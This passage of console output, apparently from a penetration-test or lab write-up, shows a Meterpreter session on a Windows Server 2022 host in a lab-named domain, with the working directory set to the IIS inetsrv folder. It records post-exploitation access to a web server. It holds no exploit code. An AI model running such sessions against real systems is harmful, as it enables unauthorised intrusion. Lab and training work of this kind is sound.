OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : labs1collabu0
Logged On Users : 14
Meterpreter     : x86/windows
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > 
```
